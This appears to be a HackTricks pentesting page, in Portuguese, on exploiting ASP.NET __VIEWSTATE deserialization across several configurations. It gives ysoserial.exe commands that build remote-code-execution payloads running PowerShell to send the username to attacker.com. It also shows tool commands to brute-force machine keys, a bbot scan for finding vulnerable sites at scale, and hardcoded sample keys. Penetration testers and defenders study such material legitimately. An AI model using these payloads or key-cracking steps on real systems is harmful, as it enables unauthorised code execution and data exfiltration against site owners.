hacktricks/pentesting-web/deserialization/exploiting-__viewstate-parameter.md

Explorando __VIEWSTATE sem conhecer os segredos

Aprenda hacking no AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)!

Outras formas de apoiar o HackTricks:

• Se você quer ver sua empresa anunciada no HackTricks ou baixar o HackTricks em PDF, confira os PLANOS DE ASSINATURA!
• Adquira o material oficial PEASS & HackTricks
• Descubra A Família PEASS, nossa coleção de NFTs exclusivos
• Participe do grupo 💬 Discord ou do grupo telegram ou siga-me no Twitter 🐦 @carlospolopm.
• Compartilhe suas técnicas de hacking enviando PRs para os repositórios do HackTricks e HackTricks Cloud no github.

Se você está interessado em carreira de hacking e em hackear o inquebrável - estamos contratando! (polonês fluente escrito e falado necessário).

{% embed url="https://www.stmcyber.com/careers" %}

O que é ViewState

ViewState é o método que o framework ASP.NET usa por padrão para preservar valores de páginas e controles entre páginas web. Quando o HTML da página é renderizado, o estado atual da página e os valores que precisam ser mantidos durante o postback são serializados em strings codificadas em base64 e saída no campo oculto ViewState ou campos.
As seguintes propriedades ou combinação de propriedades se aplicam às informações do ViewState:

• Base64
• Pode ser definido usando os atributos EnableViewStateMac e ViewStateEncryptionMode configurados como false
• Base64 + MAC (Message Authentication Code) Habilitado
• Pode ser definido usando o atributo EnableViewStateMac configurado como true
• Base64 + Criptografado
• Pode ser definido usando o atributo viewStateEncryptionMode configurado como true

Casos de Teste

Caso de Teste: 1 – EnableViewStateMac=false e viewStateEncryptionMode=false

Também é possível desativar completamente o ViewStateMAC configurando a chave de registro AspNetEnforceViewStateMac para zero em:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v{VersionHere}

Identificando Atributos ViewState

Você pode tentar identificar se o ViewState está protegido por MAC capturando uma solicitação que contenha esse parâmetro com o BurpSuite:

Se o Mac não for usado para proteger o parâmetro, você pode explorá-lo usando YSoSerial.Net.

ysoserial.exe -o base64 -g TypeConfuseDelegate -f ObjectStateFormatter -c "powershell.exe Invoke-WebRequest -Uri http://attacker.com/$env:UserName"

Caso de teste 1.5 – Como o Caso de teste 1, mas o cookie ViewState não é enviado pelo servidor

Desenvolvedores podem remover o ViewState de se tornar parte de uma Requisição HTTP (o usuário não receberá este cookie).
Pode-se assumir que se o ViewState não está presente, a implementação está segura contra quaisquer vulnerabilidades potenciais surgindo com a desserialização do ViewState.
No entanto, isso não é verdade. Se adicionarmos o parâmetro ViewState ao corpo da requisição e enviarmos nosso payload serializado criado usando ysoserial, ainda seremos capazes de alcançar execução de código como mostrado no Caso 1.

Caso de Teste: 2 – .Net < 4.5 e EnableViewStateMac=true & ViewStateEncryptionMode=false

Para ativar o MAC do ViewState para uma página específica, precisamos fazer as seguintes alterações em um arquivo aspx específico:

<%@ Page Language="C#" AutoEventWireup="true" CodeFile="hello.aspx.cs" Inherits="hello" enableViewStateMac="True"%>

Também podemos fazer isso para a aplicação overall configurando no arquivo web.config conforme mostrado abaixo:

<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.web>
<customErrors mode="Off" />
<machineKey validation="SHA1" validationKey="C551753B0325187D1759B4FB055B44F7C5077B016C02AF674E8DE69351B69FEFD045A267308AA2DAB81B69919402D7886A6E986473EEEC9556A9003357F5ED45" />
<pages enableViewStateMac="true" />
</system.web>
</configuration>

Como o parâmetro é protegido por MAC, desta vez, para executar o ataque com sucesso, precisamos primeiro da chave usada. Neste caso, o BurpSuite nos informará que o parâmetro é protegido por MAC:

Você pode tentar usar Blacklist3r(AspDotNetWrapper.exe) para encontrar a chave usada.

AspDotNetWrapper.exe --keypath MachineKeys.txt --encrypteddata /wEPDwUKLTkyMTY0MDUxMg9kFgICAw8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YWRkbdrqZ4p5EfFa9GPqKfSQRGANwLs= --decrypt --purpose=viewstate --modifier=6811C9FF --macdecode --TargetPagePath "/Savings-and-Investments/Application/ContactDetails.aspx" -f out.txt --IISDirPath="/"

--encrypteddata : __VIEWSTATE parameter value of the target application
--modifier : __VIWESTATEGENERATOR parameter value

![](https://notsosecure.com/sites/all/assets/group/nss\_uploads/2019/06/2.1.png)

[**Badsecrets**](https://github.com/blacklanternsecurity/badsecrets) é outra ferramenta que pode identificar machineKeys conhecidos. É escrita em Python, então, ao contrário do Blacklist3r, não há dependência do Windows. Para viewstates .NET, existe a utilidade "python blacklist3r", que é a maneira mais rápida de usá-la.

Ela pode ser fornecida diretamente com o viewstate e o gerador:

pip install badsecrets
git clone https://github.com/blacklanternsecurity/badsecrets
cd badsecrets
python examples/blacklist3r.py --viewstate /wEPDwUJODExMDE5NzY5ZGQMKS6jehX5HkJgXxrPh09vumNTKQ== --generator EDD8C9AE

Ou, pode-se conectar diretamente à URL alvo e tentar extrair o viewstate do HTML:

pip install badsecrets
git clone https://github.com/blacklanternsecurity/badsecrets
cd badsecrets
python examples/blacklist3r.py --url http://vulnerablesite/vulnerablepage.aspx

Para procurar viewstates vulneráveis em larga escala, em conjunto com a enumeração de subdomínios, o módulo badsecrets BBOT pode ser utilizado:

bbot -f subdomain-enum -m badsecrets -t evil.corp

Se você tiver sorte e a chave for encontrada, pode prosseguir com o ataque usando YSoSerial.Net:

ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "powershell.exe Invoke-WebRequest -Uri http://attacker.com/$env:UserName" --generator=CA0B0334 --validationalg="SHA1" --validationkey="C551753B0325187D1759B4FB055B44F7C5077B016C02AF674E8DE69351B69FEFD045A267308AA2DAB81B69919402D7886A6E986473EEEC9556A9003357F5ED45"

--generator = {__VIWESTATEGENERATOR parameter value}

Nos casos em que o parâmetro _VIEWSTATEGENERATOR não é enviado pelo servidor, você não precisa fornecer o parâmetro --generator, mas estes sim:

--apppath="/" --path="/hello.aspx"

Caso de Teste: 3 – .Net < 4.5 e EnableViewStateMac=true/false e ViewStateEncryptionMode=true

Neste caso, o Burp não identifica se o parâmetro está protegido com MAC porque não reconhece os valores. Então, o valor provavelmente está criptografado e você precisará da Machine Key para criptografar seu payload para explorar a vulnerabilidade.

Neste caso, o módulo Blacklist3r está em desenvolvimento...

Antes do .NET 4.5, o ASP.NET pode aceitar um parâmetro ___VIEWSTATE_ não criptografado dos usuários mesmo se ViewStateEncryptionMode estiver configurado para Always. O ASP.NET verifica apenas a presença do parâmetro __VIEWSTATEENCRYPTED na requisição. Se alguém remover este parâmetro e enviar o payload não criptografado, ele ainda será processado.

Portanto, se a Machinekey for conhecida (por exemplo, através de um problema de traversal de diretório), o comando YSoSerial.Net usado no Caso 2, pode ser usado para realizar RCE usando a vulnerabilidade de desserialização do ViewState.

• Remova o parâmetro __VIEWSTATEENCRYPTED da requisição para explorar a vulnerabilidade de desserialização do ViewState, caso contrário, retornará um erro de validação do MAC do Viewstate e a exploração falhará, conforme mostrado na Figura:

Caso de Teste: 4 – .Net >= 4.5 e EnableViewStateMac=true/false e ViewStateEncryptionMode=true/false exceto ambos os atributos para false

Podemos forçar o uso do framework ASP.NET especificando o parâmetro abaixo dentro do arquivo web.config, conforme mostrado abaixo.

<httpRuntime targetFramework="4.5" />

Alternativamente, isso pode ser feito especificando a opção abaixo dentro do parâmetro machineKey do arquivo web.config.

compatibilityMode="Framework45"

Como no caso anterior, o Burp não identifica se a solicitação é protegida por MAC porque o valor está criptografado. Então, para enviar um payload válido, o atacante precisa da chave.

Você pode tentar usar o Blacklist3r(AspDotNetWrapper.exe) para encontrar a chave sendo usada:

AspDotNetWrapper.exe --keypath MachineKeys.txt --encrypteddata bcZW2sn9CbYxU47LwhBs1fyLvTQu6BktfcwTicOfagaKXho90yGLlA0HrdGOH6x/SUsjRGY0CCpvgM2uR3ba1s6humGhHFyr/gz+EP0fbrlBEAFOrq5S8vMknE/ZQ/8NNyWLwg== --decrypt --purpose=viewstate  --valalgo=sha1 --decalgo=aes --IISDirPath "/" --TargetPagePath "/Content/default.aspx"

--encrypteddata = {__VIEWSTATE parameter value}
--IISDirPath = {Directory path of website in IIS}
--TargetPagePath = {Target page path in application}

Para uma descrição mais detalhada de IISDirPath e TargetPagePath consulte aqui

Ou, com Badsecrets (com um valor de gerador):

cd badsecrets
python examples/blacklist3r.py --viewstate JLFYOOegbdXmPjQou22oT2IxUwCAzSA9EAxD6+305e/4MQG7G1v5GI3wL7D94W2OGpVGrI2LCqEwDoS/8JkE0rR4ak0= --generator B2774415

![](https://user-images.githubusercontent.com/24899338/227043316-13f0488f-5326-46cc-9604-404b908ebd7b.png)

Uma vez identificada uma chave de Máquina válida, **o próximo passo é gerar um payload serializado usando** [**YSoSerial.Net**](https://github.com/pwntester/ysoserial.net)

ysoserial.exe -p ViewState  -g TextFormattingRunProperties -c "powershell.exe Invoke-WebRequest -Uri http://attacker.com/$env:UserName" --path="/content/default.aspx" --apppath="/" --decryptionalg="AES" --decryptionkey="F6722806843145965513817CEBDECBB1F94808E4A6C0B2F2"  --validationalg="SHA1" --validationkey="C551753B0325187D1759B4FB055B44F7C5077B016C02AF674E8DE69351B69FEFD045A267308AA2DAB81B69919402D7886A6E986473EEEC9556A9003357F5ED45"

Se você tiver o valor de __VIEWSTATEGENERATOR, pode tentar usar o parâmetro --generator com esse valor e omitir os parâmetros --path e --apppath

Se a vulnerabilidade de deserialização ViewState for explorada com sucesso, um servidor controlado pelo atacante receberá uma solicitação fora de banda contendo o nome de usuário. Prova de Conceito de Exploração Bem-Sucedida

Caso de Teste 6 – ViewStateUserKeys está sendo usado

A propriedade ViewStateUserKey pode ser usada para defender contra um ataque CSRF. Se tal chave foi definida na aplicação e tentarmos gerar o ViewState payload com os métodos discutidos até agora, o payload não será processado pela aplicação.
Você precisa usar mais um parâmetro para criar corretamente o payload:

--viewstateuserkey="randomstringdefinedintheserver"

Resultado de uma Exploração Bem-Sucedida

Para todos os casos de teste, se o payload do ViewState YSoSerial.Net funcionar com sucesso, então o servidor responde com “500 Internal server error” tendo o conteúdo da resposta “The state information is invalid for this page and might be corrupted” e recebemos a solicitação OOB conforme mostrado nas Figuras abaixo:

solicitação out of band com o nome de usuário atual

Referências

• https://www.notsosecure.com/exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserial-net/
• https://medium.com/@swapneildash/deep-dive-into-net-viewstate-deserialization-and-its-exploitation-54bf5b788817
• https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/
• https://blog.blacklanternsecurity.com/p/introducing-badsecrets

Se você tem interesse em carreira de hacking e em hackear o inquebrável - estamos contratando! (fluência em polonês escrito e falado exigida).

{% embed url="https://www.stmcyber.com/careers" %}

Aprenda hacking AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)!

Outras formas de apoiar o HackTricks:

• Se você quer ver sua empresa anunciada no HackTricks ou baixar o HackTricks em PDF, confira os PLANOS DE ASSINATURA!
• Adquira o merchandising oficial PEASS & HackTricks
• Descubra A Família PEASS, nossa coleção de NFTs exclusivos
• Junte-se ao grupo 💬 Discord ou ao grupo telegram ou siga-me no Twitter 🐦 @carlospolopm.
• Compartilhe suas dicas de hacking enviando PRs para os repositórios github HackTricks e HackTricks Cloud.